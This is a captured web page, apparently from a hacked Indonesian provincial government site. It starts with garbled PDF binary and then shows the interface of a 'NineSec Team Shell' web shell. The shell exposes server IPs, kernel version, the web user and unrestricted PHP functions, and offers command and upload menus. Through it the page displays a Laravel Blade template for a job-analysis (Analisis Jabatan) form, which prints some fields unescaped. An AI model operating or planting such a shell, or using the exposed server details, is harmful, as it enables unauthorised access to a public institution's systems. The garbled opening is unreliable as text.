%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 10.0.3.46  /  Your IP : 172.69.6.216
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
System : Linux ukmjuara 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON
Directory (0775) :  /proc/16354/cwd/pemprov/storage/framework/views/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //proc/16354/cwd/pemprov/storage/framework/views/a5beca0f3278c6862785b6710d3076f7ad26ed09.php
<?php $__env->startSection('title','Analisis Jabatan'); ?>

<?php $__env->startPush('style'); ?>
    <style>
        /*Now the CSS*/
        * {margin: 0; padding: 0;}

        .tree

        {
        width: 75%;
        margin: auto 15%;
        }

        .tree ul {
        padding-top: 20px; position: relative;

        transition: all 0.5s;
        -webkit-transition: all 0.5s;
        -moz-transition: all 0.5s;
        }

        .tree li {
        float: left; text-align: center;
        list-style-type: none;
        position: relative;
        padding: 20px 5px 0 5px;

        transition: all 0.5s;
        -webkit-transition: all 0.5s;
        -moz-transition: all 0.5s;
        }

        /*We will use ::before and ::after to draw the connectors*/

        .tree li::before, .tree li::after{
        content: '';
        position: absolute; top: 0; right: 50%;
        border-top: 1px solid #ccc;
        width: 50%; height: 20px;
        }

        .tree li::after{
        right: auto; left: 50%;
        border-left: 1px solid #ccc;
        }

        /*We need to remove left-right connectors from elements without 
        any siblings*/

        .tree li:only-child::after, .tree li:only-child::before {
        display: none;
        }

        /*Remove space from the top of single children*/
        .tree li:only-child{ padding-top: 0;}

        /*Remove left connector from first child and 
        right connector from last child*/
        .tree li:first-child::before, .tree li:last-child::after{
        border: 0 none;
        }

        /*Adding back the vertical connector to the last nodes*/
        .tree li:last-child::before{
        border-right: 1px solid #ccc;
        border-radius: 0 5px 0 0;
        -webkit-border-radius: 0 5px 0 0;
        -moz-border-radius: 0 5px 0 0;
        }

        .tree li:first-child::after{
        border-radius: 5px 0 0 0;
        -webkit-border-radius: 5px 0 0 0;
        -moz-border-radius: 5px 0 0 0;
        }

        /*Time to add downward connectors from parents*/

        .tree ul ul::before{
        content: '';
        position: absolute; top: 0; left: 50%;
        border-left: 1px solid #ccc;
        width: 0; height: 20px;
        }


        .tree li a{
        border: 1px solid #ccc;
        padding: 5px 10px;
        text-decoration: none;
        color: #666;
        font-family: arial, verdana, tahoma;
        font-size: 11px;
        display: inline-block;
        width: 200px;

        border-radius: 5px;
        -webkit-border-radius: 5px;
        -moz-border-radius: 5px;

        transition: all 0.5s;
        -webkit-transition: all 0.5s;
        -moz-transition: all 0.5s;
        }

        /*Time for some hover effects*/
        /*We will apply the hover effect the the lineage of the element also*/
        .tree li a:hover, .tree li a:hover+ul li a {
        background: #c8e4f8; color: #000; border: 1px solid #94a0b4;
        }

        /*Connector styles on hover*/

        .tree li a:hover+ul li::after, 
        .tree li a:hover+ul li::before,
        .tree li a:hover+ul::before,
        .tree li a:hover+ul ul::before{
        border-color:  #94a0b4;
        }

        .tree ul ul::before{
            margin-left: -1px;
        }
        .tree li a.just-line {
            display: none;
        }
        .tree a.just-line + ul {
            padding-top: 74px;
        }
        .tree a.just-line + ul:before {
            height: 74px;
        }
    </style>
<?php $__env->stopPush(); ?>

<?php $__env->startSection('content'); ?>
<div class="container">
    <div class="content">
        <nav class="breadcrumb bg-white push">
            <a class="breadcrumb-item" href="javascript:void(0)">Dashboard</a>
            <a class="breadcrumb-item" href="<?php echo e(url('job')); ?>">Analisis Jabatan</a>
            <span class="breadcrumb-item active">Detil</span>
        </nav>

        <!-- Table -->
        <div class="row">
            <div class="col-sm-6">
                <?php if(
                    (\Auth::user()->level_id == 2 || \Auth::user()->level_id == 1) && ($data->is_approve == 0)
                ): ?>
                    <button data-href="<?php echo e(url('job/approve/'. $data->analysis_id)); ?>" data-toggle="tooltip" title="Setujui Permintaan" class="btn btn-success btn-approve"> <i class="fa fa-check"></i> Setujui</button>
                    <button data-href="<?php echo e(url('job/reject/'. $data->analysis_id)); ?>" data-toggle="tooltip" title="Tolak Permintaan" class="btn btn-warning btn-reject"> <i class="fa fa-ban"></i> Tolak</button>
                <?php endif; ?>
                <?php if($data->is_approve == 2): ?>
                    <div class="text-danger">Dokumen ini ditolak karena : <?php echo e($data->rejected); ?></div>
                <?php endif; ?>
            </div>
            <div class="col-sm-6 text-right">
                <?php if($data->is_approve == 1): ?>
                    <a href="<?php echo e(url('job/export/'.$data->analysis_id)); ?>" target="_link" class="btn btn-danger"><i class="fa fa-file-pdf-o"></i> &nbsp; Export PDF</a> &nbsp;
                    <a href="<?php echo e(url('job/exportWord/'.$data->analysis_id)); ?>" target="_link" class="btn btn-primary"><i class="fa fa-file-word-o"></i> &nbsp; Download Word</a>
                <?php endif; ?>
            </div>
        </div> <br>

        <div class="block">
            <div class="block-header block-header-default text-center">
                <h3 class="block-title">Informasi Jabatan</h3>
            </div>
            <div class="block-content">
                <div class="row">
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">1. Nama Jabatan</h5>
                        <p><?php echo e($data->job->position); ?></p>
                    </div>
                    <div class="col-sm-12" style="margin-bottom:10px">
                        <h5 style="margin-bottom:10px">2. Kode Jabatan</h5>
                        <p<?php echo e($data->position_code); ?>p>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">3. Unit Kerja</h5>
                        <p>
                            <?php if($data->eselon_1 != "" || $data->eselon_1 != NULL): ?> Eselon I/ Jabatan Pimpinan Tinggi Madya : <?php echo e($data->eselon_1); ?> <br> <?php endif; ?>
                            <?php if($data->eselon_2 != "" || $data->eselon_2 != NULL): ?> Eselon IIa/ Jabatan Pimpinan Tinggi Pratama : <?php echo e($data->eselon_2); ?> <br> <?php endif; ?>
                            <?php if($data->eselon_2b != "" || $data->eselon_2b != NULL): ?> Eselon IIb/ Jabatan Pimpinan Tinggi Pratama : <?php echo e($data->eselon_2b); ?> <br> <?php endif; ?>
                            <?php if($data->eselon_3 != "" || $data->eselon_3 != NULL): ?> Eselon III / Jabatan Administrator : <?php echo e($data->eselon_3); ?> <br> <?php endif; ?>
                            <?php if($data->eselon_4 != "" || $data->eselon_4 != NULL): ?> Eselon IV / Jabatan Pengawas : <?php echo e($data->eselon_4); ?> <br> <?php endif; ?>
                            <?php if($data->executor != "" || $data->executor != NULL): ?> Jabatan Pelaksana : <?php echo e($data->executor); ?> <br> <?php endif; ?>
                        </p>
                    </div>
                    <div class="col-sm-12" style="overflow-x: auto">
                        <h5 style="margin-bottom:5px">4. Kedudukan Dalam Struktur Organisasi</h5>
                        <?php if(!empty($structure->first)): ?>  
                            <div class="tree">
                                <ul>
                                    <li>
                                    <?php if(empty($structure->second)): ?>
                                        <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->first); ?></a>
                                    <?php else: ?>
                                        <?php if($structure->first == $data->job->position): ?>
                                            <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->first); ?></a>
                                        <?php else: ?>
                                            <a href="javascript:void(0);"><?php echo e($structure->first); ?></a>
                                        <?php endif; ?>
                                    <?php endif; ?>
                                        <?php if(!empty($structure->second)): ?>  
                                            <ul>
                                                <li>
                                                <?php if( (empty($structure->third) && empty($structure->forth))): ?>
                                                    <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->second); ?></a>
                                                <?php else: ?>
                                                    <?php if($structure->second == $data->job->position): ?>
                                                        <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->second); ?></a>
                                                    <?php else: ?>
                                                        <a href="javascript:void(0);"><?php echo e($structure->second); ?></a>
                                                    <?php endif; ?>
                                                <?php endif; ?>
                                                    <?php if(!empty($structure->third)): ?>  
                                                        <ul>
                                                            <li>
                                                            <?php if(empty($structure->forth)): ?>
                                                                <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->third); ?></a>
                                                            <?php else: ?>
                                                                <?php if($structure->third == $data->job->position): ?>
                                                                    <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($structure->third); ?></a>
                                                                <?php else: ?>
                                                                    <a href="javascript:void(0);"><?php echo e($structure->third); ?></a>
                                                                <?php endif; ?>
                                                            <?php endif; ?>
                                                            <?php if(!empty($structure->forth)): ?>
                                                                <ul>
                                                                    <?php $forth = explode(",", $structure->forth); ?>
                                                                    <?php for($i=0; $i < count($forth); $i++): ?>
                                                                        <li>
                                                                            <?php if($forth[$i] == $data->job->position): ?>
                                                                                <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($forth[$i]); ?></a>
                                                                            <?php else: ?>
                                                                                <a href="javascript:void(0);"><?php echo e($forth[$i]); ?></a>
                                                                            <?php endif; ?>
                                                                                <?php if(!empty($structure->fifth)): ?>
                                                                                <ul>
                                                                                    <?php $fifth = explode(",", $structure->fifth); ?>
                                                                                    <?php for($i=0; $i < count($fifth); $i++): ?>
                                                                                        <li>
                                                                                            <?php if($fifth[$i] == $data->job->position): ?>
                                                                                                <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($fifth[$i]); ?></a>
                                                                                            <?php else: ?>
                                                                                                <a href="javascript:void(0);"><?php echo e($fifth[$i]); ?></a>
                                                                                            <?php endif; ?>
                                                                                            <?php if(!empty($structure->sixth)): ?>
                                                                                                <ul>
                                                                                                    <?php $sixth = explode(",", $structure->sixth); ?>
                                                                                                    <?php for($i=0; $i < count($sixth); $i++): ?>
                                                                                                        <?php if($sixth[$i] == $data->job->position): ?>
                                                                                                            <li>
                                                                                                                <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($sixth[$i]); ?></a>
                                                                                                            </li>
                                                                                                        <?php else: ?>
                                                                                                            <li>
                                                                                                                <a href="javascript:void(0);"><?php echo e($sixth[$i]); ?></a>
                                                                                                            </li>
                                                                                                        <?php endif; ?>
                                                                                                    <?php endfor; ?>
                                                                                                </ul>
                                                                                            <?php endif; ?>
                                                                                        </li>
                                                                                    <?php endfor; ?>
                                                                                </ul>
                                                                            </li>
                                                                        <?php endif; ?>
                                                                    <?php endfor; ?>
                                                                </ul>
                                                            <?php endif; ?>
                                                            </li>
                                                        </ul>
                                                    <?php else: ?>
                                                        <?php if(!empty($structure->forth)): ?>
                                                            <ul>
                                                                <?php $forth = explode(",", $structure->forth); ?>
                                                                <?php for($i=0; $i < count($forth); $i++): ?>
                                                                    <?php if($forth[$i] == $data->job->position): ?>
                                                                        <li>
                                                                            <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($forth[$i]); ?></a>
                                                                        </li>
                                                                    <?php else: ?>
                                                                        <li>
                                                                            <a href="javascript:void(0);"><?php echo e($forth[$i]); ?></a>
                                                                            <?php if(!empty($structure->fifth)): ?>
                                                                                <ul>
                                                                                    <?php $fifth = explode(",", $structure->fifth); ?>
                                                                                    <?php for($i=0; $i < count($fifth); $i++): ?>
                                                                                        <?php if($fifth[$i] == $data->job->position): ?>
                                                                                            <li>
                                                                                                <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($fifth[$i]); ?></a>
                                                                                            </li>
                                                                                        <?php else: ?>
                                                                                            <li>
                                                                                                <a href="javascript:void(0);"><?php echo e($fifth[$i]); ?></a>
                                                                                                    <?php if(!empty($structure->sixth)): ?>
                                                                                                        <ul>
                                                                                                            <?php $sixth = explode(",", $structure->sixth); ?>
                                                                                                            <?php for($i=0; $i < count($sixth); $i++): ?>
                                                                                                                <?php if($sixth[$i] == $data->job->position): ?>
                                                                                                                    <li>
                                                                                                                        <a href="javascript:void(0);" style="background: #c8e4f8; color: #000; border: 1px solid #94a0b4;"><?php echo e($sixth[$i]); ?></a>
                                                                                                                    </li>
                                                                                                                <?php else: ?>
                                                                                                                    <li>
                                                                                                                        <a href="javascript:void(0);"><?php echo e($sixth[$i]); ?></a>
                                                                                                                    </li>
                                                                                                                <?php endif; ?>
                                                                                                            <?php endfor; ?>
                                                                                                        </ul>
                                                                                                    <?php endif; ?>
                                                                                            </li>
                                                                                        <?php endif; ?>
                                                                                    <?php endfor; ?>
                                                                                </ul>
                                                                            <?php endif; ?>
                                                                        </li>
                                                                    <?php endif; ?>
                                                                <?php endfor; ?>
                                                            </ul>
                                                        <?php endif; ?>
                                                    <?php endif; ?>
                                                </li>
                                            </ul>
                                        <?php endif; ?>
                                    </li>
                                </ul>
                            </div>
                        <?php endif; ?>
                    </div> 
                    <div class="col-sm-12" style="margin-bottom:5px"><br>
                        <h5 style="margin-bottom:5px">5. Ikhtisar Jabatan</h5>
                        <?php echo $data->job_title; ?>

                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">6. Uraian Tugas</h5>
                        <?php if($desc): ?>
                            <?php $__currentLoopData = $desc; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <h6><?php echo e(($key+1)); ?>. <?php echo e($value->title); ?></h6>
                                <h6 style="margin:5px 0">Tahapan : </h6>
                                <p><?php echo $value->description; ?></p>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                        <?php endif; ?>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">7. Bahan Kerja</h5>
                        <table class="table table-striped table-bordered">
                            <thead>
                                <th width="5%">No</th>
                                <th>Bahan Kerja</th>
                                <th>Penggunaan Dalam Tugas</th>
                            </thead>
                            <tbody>
                                <?php if($material): ?>
                                    <?php $__currentLoopData = $material; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        <tr>
                                            <td><?php echo e(($key+1)); ?></td>
                                            <td><?php echo e($value->material); ?> <?php echo e($value->material_desc); ?></td>
                                            <td><?php echo e($value->material_use); ?></td>
                                        </tr>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                <?php endif; ?>
                            </tbody>
                        </table>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">8. Peralatan / Alat Kerja</h5>
                        <table class="table table-striped table-bordered">
                            <thead>
                                <th width="5%">No</th>
                                <th>Perangkat Kerja</th>
                                <th>Digunakan Untuk Tugas</th>
                            </thead>
                            <tbody>
                                <?php if($tool): ?>
                                    <?php $__currentLoopData = $tool; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        <tr>
                                            <td><?php echo e(($key+1)); ?></td>
                                            <td><?php echo e($value->tool); ?></td>
                                            <td><?php echo e($value->tool_use); ?></td>
                                        </tr>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                <?php endif; ?>
                            </tbody>
                        </table>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">9. Hasil Kerja</h5>
                        <table class="table table-striped table-bordered">
                            <thead>
                                <th width="5%">No</th>
                                <th>Hasil Kerja <sup>1)</sup></th>
                                <th>Satuan Hasil <sup>2)</sup></th>
                            </thead>
                            <tbody>
                                <?php if($workresult): ?>
                                    <?php $__currentLoopData = $workresult; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        <tr>
                                            <td><?php echo e(($key+1)); ?></td>
                                            <td><?php echo e($value->results); ?></td>
                                            <td><?php echo e($value->unit_of_results); ?></td>
                                        </tr>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                <?php endif; ?>
                            </tbody>
                        </table>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">10. Tanggung Jawab</h5>
                        <?php if($responsible): ?>
                            <ol style="margin-left:0; padding-left:20px;">
                            <?php $__currentLoopData = $responsible; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <li><?php echo e($value->responsible); ?></li>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </ol>
                        <?php endif; ?>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">11. Wewenang</h5>
                        <?php if($authority): ?>
                            <ol style="margin-left:0; padding-left:20px;">
                            <?php $__currentLoopData = $authority; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <li><?php echo e($value->authority); ?></li>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </ol>
                        <?php endif; ?>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">12. Korelasi Jabatan</h5>
                        <table class="table table-striped table-bordered">
                            <thead>
                                <th width="5%">No</th>
                                <th>Jabatan</th>
                                <th>Unit Kerja/ Instansi</th>
                                <th>Dalam Hal</th>
                            </thead>
                            <tbody>
                                <?php if($correlation): ?>
                                    <?php $__currentLoopData = $correlation; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        <tr>
                                            <td><?php echo e(($key+1)); ?></td>
                                            <td><?php echo e($value->position); ?></td>
                                            <td><?php echo e($value->organization); ?></td>
                                            <td><?php echo e($value->correlation_use); ?></td>
                                        </tr>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                <?php endif; ?>
                            </tbody>
                        </table>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">13. Kondisi Lingkungan Kerja</h5>
                        <table class="table table-striped table-bordered">
                            <thead>
                                <th width="5%">No</th>
                                <th>Aspek</th>
                                <th>Faktor</th>
                            </thead>
                            <tbody>
                                <?php if($workenv): ?>
                                    <?php $__currentLoopData = $workenv; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        <tr>
                                            <td><?php echo e(($key+1)); ?></td>
                                            <td><?php echo e($value->aspect); ?></td>
                                            <td><?php echo e($value->factor); ?></td>
                                        </tr>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                <?php endif; ?>
                            </tbody>
                        </table>
                    </div>
                    
                    <div class="col-sm-12"><br>
                        <h5 style="margin-bottom:5px">14. Resiko Bahaya</h5>
                        <p><?php echo $data->risk_of_danger; ?></p>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">15. Syarat Jabatan</h5>
                        <?php if($termofoffice): ?>
                            <ol style="list-style-type: none; margin-left:0; padding-left:0px; color:black">
                            <?php $__currentLoopData = $termofoffice; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <li>
                                    <?php if($key == 0): ?>
                                        <strong> a.  <?php echo e($value->term); ?> </strong> : <?php echo e($value->description); ?>

                                    <?php elseif($key == 1): ?>
                                        <strong> b.  <?php echo e($value->term); ?> </strong> : <?php echo e($value->description); ?> <br>
                                        <strong> c. Kursus / Diklat </strong>
                                    <?php elseif($key == 2 || $key == 3): ?>
                                        <div style="margin-left:20px;"><?php echo e($value->term); ?> : <br> <?php echo $value->description; ?></div>
                                    <?php elseif($key == 4): ?>
                                        <strong> d.  <?php echo e($value->term); ?> </strong> : <?php echo e($value->description); ?>

                                    <?php elseif($key == 5): ?>
                                        <strong> e.  <?php echo e($value->term); ?> </strong> : <?php echo e($value->description); ?>

                                    <?php elseif($key == 6): ?>
                                        <strong> f.  <?php echo e($value->term); ?> </strong> : <?php echo e($value->description); ?>

                                    <?php endif; ?>
                                </li>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </ol>
                        <?php endif; ?>
                        <h6 style="margin-bottom:5px">g. Bakat Kerja</h6>
                        <?php if($talent): ?>
                            <ol style="margin-left:0; padding-left:20px;">
                            <?php $__currentLoopData = $talent; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <li><?php echo e($value->kode); ?> <?php echo e($value->description); ?></li>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </ol>
                        <?php endif; ?>
                        <h6 style="margin-bottom:5px">h. Tempramen Kerja</h6>

                        <?php if($temprament): ?>
                            <ol style="margin-left:0; padding-left:20px;">
                            <?php $__currentLoopData = $temprament; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <li><?php echo e($value->kode); ?> <?php echo e($value->description); ?></li>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </ol>
                        <?php endif; ?>

                        <h6 style="margin-bottom:5px">i. Minat Kerja</h6>

                        <?php if($interest): ?>
                            <ol style="margin-left:0; padding-left:20px;">
                            <?php $__currentLoopData = $interest; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <li><?php echo e($value->kode); ?> <?php echo e($value->description); ?></li>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </ol>
                        <?php endif; ?>

                        <h6 style="margin-bottom:5px">j. Upaya Fisik</h6>

                        <?php if($effort): ?>
                            <ol style="margin-left:0; padding-left:20px;">
                            <?php $__currentLoopData = $effort; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <li><?php echo e($value->kode); ?> <?php echo e($value->description); ?></li>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </ol>
                        <?php endif; ?>

                        <h6 style="margin-bottom:5px">k. Kondisi Fisik</h6>
                        
                        <?php if($condition): ?>
                            <ol style="margin-left:0; padding-left:20px;">
                            <?php $__currentLoopData = $condition; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <li><?php echo e($value->type); ?> : <?php echo e($value->information); ?></li>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </ol>
                        <?php endif; ?>

                        <h6 style="margin-bottom:5px">l. Fungsi Jabatan</h6>

                        <?php if($jobfunction): ?>
                            <ol style="margin-left:0; padding-left:20px;">
                            <?php $__currentLoopData = $jobfunction; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                <li><?php echo e($value->kode); ?> <?php echo e($value->description); ?></li>
                            <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                            </ol>
                        <?php endif; ?>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">16. Prestasi Kerja yang diharapkan</h5>
                        <table class="table table-striped table-bordered">
                            <thead>
                                <th width="5%">No</th>
                                <th>Satuan Hasil <sup>1</sup></th>
                                <th>Jumlah Hasil (Dalam 1 Tahun)</th>
                                <th>Waktu Penyelesaian <sup>2)</sup></th>
                            </thead>
                            <tbody>
                                <?php if($performance): ?>
                                    <?php $__currentLoopData = $performance; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $value): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?>
                                        <tr>
                                            <td><?php echo e(($key+1)); ?></td>
                                            <td><?php echo e($value->unit_of_results); ?></td>
                                            <td><?php echo e($value->number_of_results); ?></td>
                                            <td><?php echo e($value->time_of_completion); ?></td>
                                        </tr>
                                    <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?>
                                <?php endif; ?>
                            </tbody>
                        </table>
                    </div>
                    <div class="col-sm-12">
                        <h5 style="margin-bottom:5px">17. Butir Informasi Lain : </h5> <?php echo $data->information_etc; ?> 
                    </div>
                    <div class="col-sm-10 text-right">Bandung, ...................</div>
                    <div class="col-sm-6 text-center">
                        Mengetahui : <br>
                        Atasan langsung <br>
                        <br>
                        <br>
                        <br>
                        <br>
                        <br>
                        .......................................... <br>
                        NIP. ………………………….
                        <p></p>
                    </div>
                    <div class="col-sm-6 text-center"><br>
                    Yang membuat <br>
                    <br>
                    <br>
                    <br>
                    <br>
                    <br>
                    ..........................................<br>
                    NIP. ………………………….
                    <p></p>
                    </div>
                </div>
            </div>
        </div>
        <!-- END Table -->
    </div>


</div>

<?php echo $__env->make('modal_approve', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>
<?php echo $__env->make('modal_reject', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>
<?php $__env->stopSection(); ?>

<?php $__env->startPush('script'); ?>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/0.4.1/html2canvas.min.js"></script>
    <script src="<?php echo e(asset('canvas2image.js')); ?>"></script>
    <script type="text/javascript">
        $('.btn-approve').click(function(){
        	var action = $(this).data('href');

        	$('#modalApprove').modal('show');
        	$('.block-title').html('Persetujuan Analisis Jabatan');
            $('#formApprove').attr('action',action);
        });

        $('.btn-reject').click(function(){
        	var action = $(this).data('href');

        	$('#modalReject').modal('show');
        	$('.block-title').html('Penolakan Analisis Jabatan');
            $('#formReject').attr('action',action);
        });
    </script>
<?php $__env->stopPush(); ?>

<?php echo $__env->make('layouts.root', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

NineSec Team - 2022